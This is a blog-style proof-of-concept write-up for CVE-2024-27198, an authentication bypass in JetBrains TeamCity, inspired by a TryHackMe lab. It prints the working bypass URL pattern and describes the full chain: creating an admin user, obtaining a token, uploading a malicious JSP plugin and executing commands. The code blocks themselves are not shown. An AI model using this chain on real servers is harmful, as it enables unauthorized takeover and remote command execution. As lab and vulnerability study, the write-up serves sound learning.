# CVE-2024-27198 Hello everyone today we have something different today we going to make POC of the CVE-2024-27198 vulnerability affecting JetBrains TeamCity versions prior to 2023.11.4. What make me think of creating this exploit was a Try Hack Me machine. called Brains. i uses an exploit there and i thought why do not i make it myself and here i did it. *** ## Git. All of the code is exist within my git repo. {% embed url="" %} ## What is CVE-2024-27198. the CVE-2024-27198 is a authentication bypass vulnerability which able unauthenticated attacker to access authenticated endpoints. {% embed url="" %} {% embed url="" %} Hack The Box and Rapid 7 explain the vulnerability better than my so here we just going to go through the code and explain it. ## The 3 Rules. To exploit this vulnerability 3 rules must be satisfied. 1. We fist need to generate Request the return 404. Simple access unexistence end point. 2. We need to add jsp as url prameter and assigne the authenticated endpoint as it's value. 3. We need to end it with ;.jsp. the ; mean sperate from the rest .jsp to make it look as jsp request. using such url on vuln version will allow you to access secure endpoints. `{ip_address}/sdkjhdfajghsjdhf?jsp=/app/rest/server;.jsp` 1. `/sdkjhdfajghsjdhf.` non existance page. 2. `jsp=/app/rest/server` the page we want to access within the jsp parameter. 3. `;.jsp` end with ;.jsp. ## The Exploit. ### Check if the exploit exist.

First we take the Url of the target system as command line argument.

Then we check if the target system is vulnerable or not.

This is\_vuln function is so simple it returns boolean value. ### Generate username and password and create user.

So here we generate random username and password and create a new user with administrator access.

and this is a create\_new\_user functionj which take random generated username and password and send it as json request. ### generate token.

So as you can see we call function get\_token and this function will return either a token or nothing or error. and a best world it will return a valid token so that we can upload our exploit.

This is the get token function it will fetch the token for the id user 1 which usually is the admin. ### Upload payload and execute commands.

To to these we need to make sure that we have a valid token thats why if the generation of the token failed we can not compelete the exploit.

This is the upload evil plugin function i give the credits to this beast. {% embed url="" %} This zip file contain these to files. ![](https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FwlBTouNEUafFXxUfiBgz%2Fimage.png?alt=media\&token=7ac4eb7e-5561-4e3d-b312-9e3df2cf487d)

So for myPlugin.jsp we use jsp which is a java code that can run on the web. and the xml file is just to know details about the plugin. and we just send the file as parts. #### enable the plugin. So after uploading the plugin we just need to enable it.

#### Execute commands. After upload and enable the plugin we can execute commands.

As you can see we can access our plugin url and execute commands. ### Running the code.

As you can see we able to execute out command which is whoami. and since am running this in docker so its a root user.

And here from the web we can execute commands from get prameter. ## Conclusion. in the end what actully make me try to make this exploit is first that i love to create exploit specilly in Rust and i want to see how a big product such jetBrains could have such weak vulnerability. Finally i would like to credite. {% embed url="" %} i learned from him to get the docker container and the java exploit he is a master.